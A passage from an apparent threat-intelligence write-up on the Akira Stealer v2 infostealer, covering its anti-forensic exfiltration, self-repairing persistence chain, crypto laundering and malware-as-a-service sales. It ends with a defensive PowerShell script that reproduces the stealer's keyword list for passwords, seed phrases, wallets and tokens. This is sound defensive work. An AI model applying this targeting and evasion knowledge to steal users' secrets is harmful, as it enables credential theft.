logs.",[1257,18349,18350,18353],{},[251,18351,18352],{},"EDR Blind Spots",": Tools like Microsoft Defender for Endpoint may flag the HTTP request attempt but cannot extract the embedded URL.",[12,18355,18356],{},[251,18357,18358],{},"4. Why the Analyst Cannot Recover This Locally:",[1254,18360,18361,18374,18393],{},[1257,18362,18363,18366,18367,18369,18370,18373],{},[251,18364,18365],{},"No Local Copy of Link",": The malware writes the ",[63,18368,18172],{}," only in memory and transmits it over the network; it does ",[3456,18371,18372],{},"not"," save this URL to disk or logs.",[1257,18375,18376,18379,18380,18382,1297,18387,18389,18390,1013],{},[251,18377,18378],{},"Ephemeral Staging Cleanup",": Immediately after upload, the code executes:",[531,18381],{},[102,18383,18386],{"className":18384},[18385],"text-monospace","shutil.rmtree(ROOT)",[531,18388],{},"\nerasing all staged artifacts (including any transient text files) from ",[63,18391,18392],{},"%TEMP%",[1257,18394,18395,18398,18399,18402],{},[251,18396,18397],{},"Network-Only Transmission",": Webhook calls (",[63,18400,18401],{},"requests.post",") occur in-memory; no HTTP logs or browser history entries are created on the victim machine.",[2110,18404,18405],{},[12,18406,18407,18410,18411,18413,18414,18416],{},[251,18408,18409],{},"Implication for Analysts:","\nWithout live packet capture (e.g., network TAP or proxy) at the time of execution, the exact ",[63,18412,18172],{}," is unrecoverable post-infection.\nAdditionally, the exfiltrated archive is auto-deleted from the hosting service, further reducing the window for forensic retrieval.\nPost-infection imaging or host-based forensic recovery will ",[3456,18415,18372],{}," reveal the attacker’s URL or file host credentials, as no artifacts remain locally.",[52,18418],{"className":18419},[8535,8536],[41,18421,18423],{"id":18422},"_713-conclusion","7.13 Conclusion",[12,18425,47],{},[12,18427,18428,18430],{},[63,18429,8304],{}," (Akira Stealer v2) is a comprehensive, commercially distributed stealer toolkit. It combines extensive targeting, sophisticated anti-analysis, dynamic infrastructure control, and full-stack data theft across credentials, crypto, system profiling, and user files. Its modularity and stealth, combined with rapid reinfection methods, make it one of the most technically advanced stealers observed in active deployment.",[25,18432,18434],{"id":18433},"_8-circular-execution-chain-a-self-healing-loop","8. Circular Execution Chain: A Self-Healing Loop",[12,18436,31],{},[12,18438,18439,18440,18443],{},"One of the most technically sophisticated elements of this campaign is its regenerative, circular execution model. Unlike conventional malware with linear stages that flow from dropper to payload and then vanish, this operation was engineered like a ",[251,18441,18442],{},"closed loop"," — where every component watches over the others.",[12,18445,18446,18447,18450],{},"This ",[251,18448,18449],{},"self-healing architecture"," made the infection chain not only persistent, but also autonomous. It could fully recover from partial removals. As long as one piece remained alive, the entire malware ecosystem could reassemble itself.",[41,18452,18454],{"id":18453},"_81-behavioral-breakdown","8.1 Behavioral Breakdown",[12,18456,47],{},[3259,18458,18459,18485,18498,18529,18547],{},[1257,18460,18461,18466,18468,18469,18472,18473,18475,18476,18478,18479,18481,18482,18484],{},[251,18462,18463,18464,1288],{},"Persistence Anchor (",[63,18465,8296],{},[63,18467,8296],{}," acts as the foundational foothold. It is typically dropped into a Windows user startup location, such as ",[63,18470,18471],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup",", or registered via ",[63,18474,9343],{},". Its job is simple but critical: ensure ",[63,18477,8300],{}," is present and launch it silently during user logon. If ",[63,18480,8300],{}," is missing, it re-extracts the archive ",[63,18483,9509],{}," (located in a temp folder or dropped anew), regenerating the full Electron app structure.",[1257,18486,18487,18492,18494,18495,18497],{},[251,18488,18489,18490,1288],{},"Bridge Loader (",[63,18491,8300],{},[63,18493,8300],{}," is the Electron-wrapped Node.js application. It doesn’t expose any GUI and operates entirely in the background. Upon execution, it runs the embedded JavaScript logic within ",[63,18496,8749],{},", using Node.js as a runtime environment. This abstraction layer decouples the core logic from the PE stub, helping to evade traditional analysis.",[1257,18499,18500,18505,18506,18508,18509],{},[251,18501,18502,18503,1288],{},"Execution Orchestrator (",[63,18504,10485],{},"\nEmbedded within ",[63,18507,8749],{},", this is the true controller of the infection chain. Its key functions include:",[1254,18510,18511,18517,18520],{},[1257,18512,18513,18514,18516],{},"Checking for the presence of ",[63,18515,8296],{}," and redeploying it if missing",[1257,18518,18519],{},"Dynamically injecting runtime configuration: webhook URLs, C2 addresses, tokens",[1257,18521,18522,18523,18525,18526,18528],{},"Either invoking the already-present Python payload (",[63,18524,8304],{},") or downloading it as part of a ZIP bundle (e.g., ",[63,18527,10549],{},") from attacker-controlled infrastructure",[1257,18530,18531,18536,18537,18539,18540,18542,18543,18546],{},[251,18532,18533,18534,1288],{},"Payload Execution (",[63,18535,8304],{},"\nOnce triggered, ",[63,18538,8304],{}," executes in memory via ",[63,18541,8276],{},". It systematically collects saved credentials, cookies, Discord tokens, browser session data, and cryptocurrency wallet extensions. The data is staged in a ZIP archive and exfiltrated via HTTPS — commonly to Discord webhooks, but fallback APIs like ",[63,18544,18545],{},"gofile.io"," or custom C2 endpoints have also been observed.",[1257,18548,18549,18552,18553,18555,18556,18558,18559,18561,18562,18564,18565,18567],{},[251,18550,18551],{},"Loop Integrity and Self-Healing","\nThe design is circular. If ",[63,18554,8296],{}," is deleted, it will be redeployed. If ",[63,18557,8300],{}," is missing, ",[63,18560,8296],{}," re-extracts it from ",[63,18563,9509],{},". If ",[63,18566,8304],{}," is deleted, it is re-obtained by the JavaScript layer. This interdependency makes the malware resilient and capable of reconstructing its execution chain from virtually any surviving fragment.",[12,18569,18570,18571,18574],{},"This architecture is not just modular — it’s ",[251,18572,18573],{},"self-sustaining",", deliberately engineered for stealth, flexibility, and long-term survivability in target environments.",[41,18576,18578],{"id":18577},"_82-why-this-is-noteworthy","8.2 Why This Is Noteworthy",[12,18580,47],{},[12,18582,18583,18584,1013],{},"The campaign’s architectural design reflects a level of sophistication not typically seen in commodity infostealers. It goes beyond simple multi-stage loaders — this is malware engineered for ",[251,18585,18586],{},"operational resilience, stealth, and automation",[12,18588,18589],{},[251,18590,18591],{},"Key Characteristics",[1254,18593,18594,18600,18637,18657],{},[1257,18595,18596,18599],{},[251,18597,18598],{},"Full Autonomy","\nOnce deployed, the malware requires no user interaction or external reactivation. It acts like a malicious microservice — orchestrating its own persistence, payload execution, and repair routines without external control.",[1257,18601,18602,18605,18606],{},[251,18603,18604],{},"Multi-Language Execution Stack","\nThe toolchain integrates:",[1254,18607,18608,18617,18623,18629],{},[1257,18609,18610,1402,18613,805,18615,1288],{},[251,18611,18612],{},"PE Binaries",[63,18614,8296],{},[63,18616,8300],{},[1257,18618,18619,18622],{},[251,18620,18621],{},"Node.js / JavaScript"," (via Electron)",[1257,18624,18625,18628],{},[251,18626,18627],{},"PowerShell"," (used for obfuscated payload relay)",[1257,18630,18631,1402,18634,18636],{},[251,18632,18633],{},"Python",[63,18635,8304],{},", executed as memory-resident stealer)\nThis layered composition makes it harder to profile, fingerprint, and analyze using conventional static tools.",[1257,18638,18639,18642,18643],{},[251,18640,18641],{},"Defense Evasion by Design","\nEvery component is encoded, encrypted, or dynamically injected:",[1254,18644,18645,18648,18651,18654],{},[1257,18646,18647],{},"Base64 PowerShell relay",[1257,18649,18650],{},"AES-encrypted and GZIP-compressed Python core",[1257,18652,18653],{},"Obfuscated JavaScript with runtime token injection",[1257,18655,18656],{},"Self-healing behavior that frustrates partial removal",[1257,18658,18659,18662,18663,18564,18666,18668,18669,18671],{},[251,18660,18661],{},"No Single Point of Failure","\nThe malware’s self-repair logic ensures that ",[251,18664,18665],{},"removal of a single component is insufficient",[63,18667,8296],{}," is removed, the info stealer recreates it. If ",[63,18670,8304],{}," is deleted, it is redownloaded and redeployed by the JavaScript controller.",[12,18673,18674,18675,18678],{},"In short, the malware behaves more like a ",[251,18676,18677],{},"distributed system"," than a typical payload — one that prioritizes survivability, modularity, and stealth.",[12,18680,18681,18682,18685],{},"This elevates the threat from an opportunistic attack to a ",[251,18683,18684],{},"resilient, adaptive platform"," — requiring defenders to match its complexity with equally layered detection and response strategies.",[41,18687,18689],{"id":18688},"_83-implications-for-blue-teams","8.3 Implications for Blue Teams",[12,18691,47],{},[12,18693,18694],{},"For defenders and CSOC operators, this kind of architecture raises the bar:",[1254,18696,18697,18703,18718],{},[1257,18698,18699,18702],{},[251,18700,18701],{},"Partial cleanup is ineffective",". All nodes must be identified and removed simultaneously.",[1257,18704,18705,18708,18709,18711,18712,18711,18714,18711,18716,1013],{},[251,18706,18707],{},"Defender for Endpoint correlation"," is essential. Analysts must trace full chains: from ",[63,18710,8296],{}," → ",[63,18713,8804],{},[63,18715,8899],{},[63,18717,8276],{},[1257,18719,18720,18723],{},[251,18721,18722],{},"IOC-free persistence"," means memory-based heuristics, telemetry baselining, and chain-based detection are key.",[12,18725,18726,18727,18730],{},"This isn’t just a stealer. It’s a ",[251,18728,18729],{},"resilient malware platform"," — behaving more like a distributed system than a simple threat. And that’s exactly what makes it both impressive and dangerous.",[25,18732,18734],{"id":18733},"_9-blockchain-tracking-and-analysis","9. Blockchain Tracking and Analysis",[12,18736,31],{},[41,18738,18740],{"id":18739},"_91-tracing-fund-distribution-in-a-litecoin-based-malware-campaign","9.1 Tracing Fund Distribution in a Litecoin-Based Malware Campaign",[12,18742,47],{},[12,18744,18745,18746,18749],{},"During the reverse engineering phase of this malware campaign, we extracted multiple hardcoded wallet addresses used by the stealer for cryptocurrency exfiltration. By following the on-chain activity of these Litecoin wallets, we were able to uncover patterns indicative of deliberate money laundering tactics. The attacker-controlled wallet ",[63,18747,18748],{},"LW6EopiZ..."," acts as a central aggregation point. Funds stolen from multiple victims are funneled into this address, after which they are rapidly redistributed across multiple new addresses.",[12,18751,18752],{},"The behavior seen here is representative of a classic split-transfer pattern used in crypto tumbling or mixing operations. In each instance, the full incoming balance is divided into two roughly proportional outbound transactions, each sent to a different wallet. This strategy is designed to hinder address clustering and chain tracing by obfuscating the provenance of funds. It’s an effective tactic to evade detection by automated blockchain analytics and threat intelligence platforms.",[12,18754,18755],{},"This laundering behavior leverages a combination of transaction timing, precise value splitting, and address reuse minimization to bypass heuristics commonly applied by clustering algorithms like those used in GraphSense, Chainalysis, or TRM Labs. The overall intent is to create high-entropy transactional flows, which confuse attribution and disrupt linkability, especially when the funds are eventually bridged across other assets or swapped into privacy-focused coins.",[12,18757,18758],{},"In the example below, we show a structured subset of this behavior. The incoming transactions represent distinct victim transfers. These values are then perfectly mapped to outbound flows, showing the coins being \"washed\" through fast, predictable, and algorithmically split payouts.",[417,18760,420,18763],{"className":18761,"style":12346},[18762],"font-size-1",[438,18764,18765,420,18788,420,18820,420,18848,420,18877],{},[426,18766,424,18767,424,18771,424,18775,424,18778,424,18782,424,18785,420],{},[430,18768,18770],{"style":18769},"text-align: left; width: 14%;","Input Source",[430,18772,18774],{"style":18773},"text-align: left; width: 12%;","Input Date",[430,18776,18777],{"style":18769},"Amount In (LTC)",[430,18779,18781],{"style":18780},"text-align: left; width: 20%;","→ Attacker Wallet",[430,18783,18784],{"style":13965},"Output Addresses",[430,18786,18787],{"style":12514},"Total Out (LTC)",[426,18789,424,18790,424,18793,424,18796,424,18799,424,18805,424,18818,420],{},[443,18791,18792],{},"Input_1",[443,18794,18795],{},"2024-09-21",[443,18797,18798],{},"0.25339198",[443,18800,428,18801,424],{},[102,18802,18804],{"title":18803},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[443,18806,18807,18808,18811,18812,18807,18814,18817],{},"\n      - ",[63,18809,18810],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[531,18813],{},[63,18815,18816],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n    ",[443,18819,18798],{},[426,18821,424,18822,424,18825,424,18828,424,18831,424,18835,424,18846,420],{"style":12370},[443,18823,18824],{},"Input_2",[443,18826,18827],{},"2024-04-16",[443,18829,18830],{},"1.09976044",[443,18832,428,18833,424],{},[102,18834,18804],{"title":18803},[443,18836,18807,18837,18840,18841,18807,18843,18845],{},[63,18838,18839],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[531,18842],{},[63,18844,18839],{}," (0.25671380, 2024-06-13)\n    ",[443,18847,18830],{},[426,18849,424,18850,424,18853,424,18856,424,18859,424,18863,424,18875,420],{},[443,18851,18852],{},"Input_3",[443,18854,18855],{},"2024-03-06",[443,18857,18858],{},"0.77089346",[443,18860,428,18861,424],{},[102,18862,18804],{"title":18803},[443,18864,18807,18865,18868,18869,18807,18871,18874],{},[63,18866,18867],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[531,18870],{},[63,18872,18873],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n    ",[443,18876,18858],{},[426,18878,424,18879,424,18882,424,18884,424,18886,424,18890,424,18900,420],{"style":12370},[443,18880,18881],{},"Input_4",[443,18883,18855],{},[443,18885,18858],{},[443,18887,428,18888,424],{},[102,18889,18804],{"title":18803},[443,18891,18807,18892,18868,18895,18807,18897,18874],{},[63,18893,18894],{},"LUFLTrqYpix...",[531,18896],{},[63,18898,18899],{},"La22dfH9eM...",[443,18901,18858],{},[52,18903],{"className":18904},[8535,8536],[25,18906,18908],{"id":18907},"_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","10. Inside the Akira Ecosystem – Commercialized Cybercrime Infrastructure",[12,18910,31],{},[12,18912,18913],{},"Akira is not just a stealer—it’s the centerpiece of a thriving underground ecosystem designed to simplify, scale, and monetize cybercrime.",[41,18915,18917],{"id":18916},"_101-a-plug-and-play-ecosystem-for-threat-actors","10.1 A Plug-and-Play Ecosystem for Threat Actors",[12,18919,47],{},[12,18921,18922],{},"The Akira ecosystem exemplifies the evolution of cybercrime into a professionalized, service-driven economy. It includes:",[1254,18924,18925,18934,18940,18946,18952],{},[1257,18926,18927,18930,18931,1288],{},[251,18928,18929],{},"Builder Bots"," for on-demand payload generation (e.g., ",[63,18932,18933],{},"@AkiraRedBot",[1257,18935,18936,18939],{},[251,18937,18938],{},"Telegram channels"," for updates, feature requests, and customer support",[1257,18941,18942,18945],{},[251,18943,18944],{},"Automated licensing and payment handling",", often via direct messages or anonymous e-commerce platforms like Sellix",[1257,18947,18948,18951],{},[251,18949,18950],{},"Bundled modules"," such as clipboard hijackers, Discord token loggers, browser data stealers, and even ransomware add-ons",[1257,18953,18954,18957],{},[251,18955,18956],{},"Customizable payloads"," with configuration interfaces allowing toggles, webhook input, and icon branding",[12,18959,18960],{},[2642,18961],{"alt":18962,"src":18963},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[41,18965,18967],{"id":18966},"_102-commercialization-of-cybercrime","10.2 Commercialization of Cybercrime",[12,18969,47],{},[12,18971,18972],{},"Akira's structure reflects a broader movement toward \"Malware-as-a-Service\" (MaaS), where:",[1254,18974,18975,18981,18987,18993],{},[1257,18976,18977,18980],{},[251,18978,18979],{},"No deep technical skill"," is required to launch attacks",[1257,18982,18983,18986],{},[251,18984,18985],{},"Low entry costs"," ($75 for 3 months, $150 for lifetime)",[1257,18988,18989,18992],{},[251,18990,18991],{},"Instant support and documentation"," through Telegram",[1257,18994,18995,18998],{},[251,18996,18997],{},"Community contributions"," regularly extend Akira with scripts and feature suggestions",[12,19000,19001],{},"This ecosystem mirrors legitimate SaaS business models — with changelogs, UX improvements, pricing tiers, and upsells.",[12,19003,19004],{},[2642,19005],{"alt":19006,"src":19007},"Akria Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[41,19009,19011],{"id":19010},"_103-beyond-the-stealer-the-ecosystems-components","10.3 Beyond the Stealer – The Ecosystem's Components",[12,19013,47],{},[12,19015,9399,19016,19018],{},[63,19017,8304],{}," is the heart of many attacks, the ecosystem provides a full chain:",[1254,19020,19021,19024,19027,19030,19033],{},[1257,19022,19023],{},"Obfuscation tools like PyInstaller wrappers",[1257,19025,19026],{},"File binders for coupling malicious payloads with benign software",[1257,19028,19029],{},"Compilers, crypters, and runtime polymorphism",[1257,19031,19032],{},"Hosting mirrors for payload delivery and exfiltration (e.g., GoFile, AnonFiles)",[1257,19034,19035],{},"Data management bots that summarize stolen credentials and hardware profiles",[12,19037,19038],{},[2642,19039],{"alt":19040,"src":19041},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[25,19043,19045],{"id":19044},"_11-akira-stealer-quickcheck-affected-files","11. Akira Stealer QuickCheck affected files",[12,19047,31],{},[41,19049,19051],{"id":19050},"_111-what-is-this-for","11.1 What Is This For?",[12,19053,47],{},[12,19055,19056,19057,805,19060,805,19063,9866,19066,19069],{},"After a suspected Akira Stealer infection, it's critical to know immediately which files on your system were at risk of exfiltration. The QuickCheck PowerShell script outlined above replicates Akira's exact search logic: it scans the user's ",[251,19058,19059],{},"Desktop",[251,19061,19062],{},"Documents",[251,19064,19065],{},"Downloads",[251,19067,19068],{},"OneDrive"," folders for files that:",[1254,19071,19072,19088,19091],{},[1257,19073,19074,19075,805,19078,805,19081,19084,19085],{},"Contain sensitive keywords in their filename, such as ",[63,19076,19077],{},"password",[63,19079,19080],{},"wallet",[63,19082,19083],{},"backup",", or ",[63,19086,19087],{},"token",[1257,19089,19090],{},"Have specific extensions commonly targeted (.txt, .docx, .pdf, .jpg, etc.)",[1257,19092,19093],{},"Are under the 2 MB size limit imposed by the malware",[12,19095,19096,19097,19100],{},"While QuickCheck offers a rapid overview based on Akira Stealer’s internal logic, ",[251,19098,19099],{},"it is not a substitute"," for comprehensive forensic tools or professional incident response. Always follow up with deeper analysis when dealing with confirmed breaches.",[12,19102,19103,19104,805,19107,805,19110,19113,19114,1013],{},"It then presents a sorted table of ",[251,19105,19106],{},"Filename",[251,19108,19109],{},"Relative Path",[251,19111,19112],{},"Size (KB)"," and the ",[251,19115,19116],{},"trigger keyword",[2110,19118,19119],{},[12,19120,19121,19124,19125,19128,19129,19131,19132,19135],{},[251,19122,19123],{},"DISCLAIMER","\nThis tool is provided ",[251,19126,19127],{},"“as is”"," without any warranty of completeness or fitness for a particular purpose. It does ",[251,19130,18372],{}," guarantee detection of ",[251,19133,19134],{},"all"," potentially sensitive files, nor does it replace full malware forensics. Use at your own risk.",[52,19137],{"className":19138},[8535],[41,19140,19142],{"id":19141},"legal-notice","Legal Notice",[12,19144,47],{},[12,19146,19147,19148,19151,19152,19155],{},"This QuickCheck Utility is intended for ",[251,19149,19150],{},"defensive security"," assessments only. Any unauthorized scanning or usage on systems you do not own may violate privacy, copyright, or computer misuse laws. glueckkanja AG assumes ",[251,19153,19154],{},"no liability"," for misuse or damages resulting from its use.",[41,19157,19159],{"id":19158},"powershell-script","PowerShell Script",[12,19161,47],{},[56,19163,19165],{"className":9365,"code":19164,"language":9367,"meta":65,"style":65},"\u003C#\n.SYNOPSIS\n    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n    Scans Desktop, Documents, Downloads and OneDrive for files that:\n      • Contain one of the defined keywords in their name\n      • Have an allowed file extension\n      • Are not larger than 2 MB\n    Presents the results in a colored, tabular overview.\n\n.NOTES\n    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n    \"$env:USERPROFILE\\Desktop\",\n    \"$env:USERPROFILE\\Documents\",\n    \"$env:USERPROFILE\\Downloads\",\n    \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize    = 2MB\n\n# -------------------------------------\n# 2. Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n    if (-not (Test-Path $folder)) { continue }\n    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n        # 2.1 Extension filter\n        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n        # 2.2 Size filter\n        if ($_.Length -gt $maxSize) { return }\n\n        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n        $hit = $null\n        foreach ($kw in $keywords) {\n            if ($_.Name.ToLower().Contains($kw)) {\n                $hit = $kw\n                break\n            }\n        }\n        if (-not $hit) { return }\n\n        # 2.4 Build relative path\n        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n        # 2.5 Collect\n        $matches.Add([PSCustomObject]@{\n            FileName    = $_.Name\n            Location    = $rel\n            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n            Keyword     = $hit\n        })\n    }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n    $matches |\n        Sort-Object Location, FileName |\n        Format-Table -AutoSize `\n            @{Label='File';       Expression={$_.FileName}},\n            @{Label='Location';   Expression={$_.Location}},\n            @{Label='Size (KB)';  Expression={$_. 'Size (KB)'}},\n            @{Label='Keyword';    Expression={$_.Keyword}}\n\n    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\n\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[63,19166,19167,19172,19177,19182,19186,19191,19196,19201,19206,19211,19216,19220,19225,19230,19235,19239,19244,19249,19253,19258,19263,19268,19273,19278,19282,19287,19292,19297,19301,19305,19310,19314,19319,19323,19328,19333,19338,19343,19348,19353,19358,19362,19367,19372,19377,19382,19387,19392,19397,19402,19407,19411,19416,19421,19425,19430,19435,19440,19445,19450,19455,19460,19465,19469,19473,19477,19482,19486,19491,19496,19501,19505,19510,19515,19520,19525,19530,19535,19540,19546,19551,19557,19562,19568,19574,19579,19584,19590],{"__ignoreMap":65},[102,19168,19169],{"class":104,"line":105},[102,19170,19171],{},"\u003C#\n",[102,19173,19174],{"class":104,"line":111},[102,19175,19176],{},".SYNOPSIS\n",[102,19178,19179],{"class":104,"line":329},[102,19180,19181],{},"    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[102,19183,19184],{"class":104,"line":346},[102,19185,11519],{"emptyLinePlaceholder":2181},[102,19187,19188],{"class":104,"line":650},[102,19189,19190],{},".DESCRIPTION\n",[102,19192,19193],{"class":104,"line":656},[102,19194,19195],{},"    Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[102,19197,19198],{"class":104,"line":662},[102,19199,19200],{},"      • Contain one of the defined keywords in their name\n",[102,19202,19203],{"class":104,"line":668},[102,19204,19205],{},"      • Have an allowed file extension\n",[102,19207,19208],{"class":104,"line":674},[102,19209,19210],{},"      • Are not larger than 2 MB\n",[102,19212,19213],{"class":104,"line":680},[102,19214,19215],{},"    Presents the results in a colored, tabular overview.\n",[102,19217,19218],{"class":104,"line":12692},[102,19219,11519],{"emptyLinePlaceholder":2181},[102,19221,19222],{"class":104,"line":12698},[102,19223,19224],{},".NOTES\n",[102,19226,19227],{"class":104,"line":12704},[102,19228,19229],{},"    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[102,19231,19232],{"class":104,"line":12710},[102,19233,19234],{},"#>\n",[102,19236,19237],{"class":104,"line":12716},[102,19238,11519],{"emptyLinePlaceholder":2181},[102,19240,19241],{"class":104,"line":12722},[102,19242,19243],{},"# -------------------------------------\n",[102,19245,19246],{"class":104,"line":12728},[102,19247,19248],{},"# 1. Configuration\n",[102,19250,19251],{"class":104,"line":12734},[102,19252,19243],{},[102,19254,19255],{"class":104,"line":12740},[102,19256,19257],{},"$scanFolders = @(\n",[102,19259,19260],{"class":104,"line":12746},[102,19261,19262],{},"    \"$env:USERPROFILE\\Desktop\",\n",[102,19264,19265],{"class":104,"line":12752},[102,19266,19267],{},"    \"$env:USERPROFILE\\Documents\",\n",[102,19269,19270],{"class":104,"line":12758},[102,19271,19272],{},"    \"$env:USERPROFILE\\Downloads\",\n",[102,19274,19275],{"class":104,"line":12764},[102,19276,19277],{},"    \"$env:USERPROFILE\\OneDrive\"\n",[102,19279,19280],{"class":104,"line":12770},[102,19281,12911],{},[102,19283,19284],{"class":104,"line":12776},[102,19285,19286],{},"$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[102,19288,19289],{"class":104,"line":13442},[102,19290,19291],{},"$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[102,19293,19294],{"class":104,"line":13447},[102,19295,19296],{},"$maxSize    = 2MB\n",[102,19298,19299],{"class":104,"line":13452},[102,19300,11519],{"emptyLinePlaceholder":2181},[102,19302,19303],{"class":104,"line":13457},[102,19304,19243],{},[102,19306,19307],{"class":104,"line":13463},[102,19308,19309],{},"# 2. Scan and Collect Matches\n",[102,19311,19312],{"class":104,"line":13468},[102,19313,19243],{},[102,19315,19316],{"class":104,"line":13473},[102,19317,19318],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[102,19320,19321],{"class":104,"line":13478},[102,19322,11519],{"emptyLinePlaceholder":2181},[102,19324,19325],{"class":104,"line":13483},[102,19326,19327],{},"foreach ($folder in $scanFolders) {\n",[102,19329,19330],{"class":104,"line":13488},[102,19331,19332],{},"    if (-not (Test-Path $folder)) { continue }\n",[102,19334,19335],{"class":104,"line":13493},[102,19336,19337],{},"    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[102,19339,19340],{"class":104,"line":13499},[102,19341,19342],{},"        # 2.1 Extension filter\n",[102,19344,19345],{"class":104,"line":13505},[102,19346,19347],{},"        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[102,19349,19350],{"class":104,"line":13511},[102,19351,19352],{},"        # 2.2 Size filter\n",[102,19354,19355],{"class":104,"line":13516},[102,19356,19357],{},"        if ($_.Length -gt $maxSize) { return }\n",[102,19359,19360],{"class":104,"line":13521},[102,19361,11519],{"emptyLinePlaceholder":2181},[102,19363,19364],{"class":104,"line":13526},[102,19365,19366],{},"        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[102,19368,19369],{"class":104,"line":13531},[102,19370,19371],{},"        $hit = $null\n",[102,19373,19374],{"class":104,"line":13537},[102,19375,19376],{},"        foreach ($kw in $keywords) {\n",[102,19378,19379],{"class":104,"line":13542},[102,19380,19381],{},"            if ($_.Name.ToLower().Contains($kw)) {\n",[102,19383,19384],{"class":104,"line":13547},[102,19385,19386],{},"                $hit = $kw\n",[102,19388,19389],{"class":104,"line":13552},[102,19390,19391],{},"                break\n",[102,19393,19394],{"class":104,"line":13557},[102,19395,19396],{},"            }\n",[102,19398,19399],{"class":104,"line":13562},[102,19400,19401],{},"        }\n",[102,19403,19404],{"class":104,"line":13567},[102,19405,19406],{},"        if (-not $hit) { return }\n",[102,19408,19409],{"class":104,"line":13573},[102,19410,11519],{"emptyLinePlaceholder":2181},[102,19412,19413],{"class":104,"line":13579},[102,19414,19415],{},"        # 2.4 Build relative path\n",[102,19417,19418],{"class":104,"line":13585},[102,19419,19420],{},"        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[102,19422,19423],{"class":104,"line":13591},[102,19424,11519],{"emptyLinePlaceholder":2181},[102,19426,19427],{"class":104,"line":13596},[102,19428,19429],{},"        # 2.5 Collect\n",[102,19431,19432],{"class":104,"line":13601},[102,19433,19434],{},"        $matches.Add([PSCustomObject]@{\n",[102,19436,19437],{"class":104,"line":13607},[102,19438,19439],{},"            FileName    = $_.Name\n",[102,19441,19442],{"class":104,"line":13613},[102,19443,19444],{},"            Location    = $rel\n",[102,19446,19447],{"class":104,"line":13619},[102,19448,19449],{},"            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[102,19451,19452],{"class":104,"line":13625},[102,19453,19454],{},"            Keyword     = $hit\n",[102,19456,19457],{"class":104,"line":13630},[102,19458,19459],{},"        })\n",[102,19461,19462],{"class":104,"line":13635},[102,19463,19464],{},"    }\n",[102,19466,19467],{"class":104,"line":13641},[102,19468,10086],{},[102,19470,19471],{"class":104,"line":13646},[102,19472,11519],{"emptyLinePlaceholder":2181},[102,19474,19475],{"class":104,"line":13651},[102,19476,19243],{},[102,19478,19479],{"class":104,"line":13657},[102,19480,19481],{},"# 3. Display Results\n",[102,19483,19484],{"class":104,"line":13663},[102,19485,19243],{},[102,19487,19488],{"class":104,"line":13669},[102,19489,19490],{},"clear\n",[102,19492,19493],{"class":104,"line":13674},[102,19494,19495],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[102,19497,19498],{"class":104,"line":13680},[102,19499,19500],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[102,19502,19503],{"class":104,"line":13686},[102,19504,11519],{"emptyLinePlaceholder":2181},[102,19506,19507],{"class":104,"line":13691},[102,19508,19509],{},"if ($matches.Count -gt 0) {\n",[102,19511,19512],{"class":104,"line":13697},[102,19513,19514],{},"    $matches |\n",[102,19516,19517],{"class":104,"line":13703},[102,19518,19519],{},"        Sort-Object Location, FileName |\n",[102,19521,19522],{"class":104,"line":13708},[102,19523,19524],{},"        Format-Table -AutoSize `\n",[102,19526,19527],{"class":104,"line":13713},[102,19528,19529],{},"            @{Label='File';       Expression={$_.FileName}},\n",[102,19531,19532],{"class":104,"line":13718},[102,19533,19534],{},"            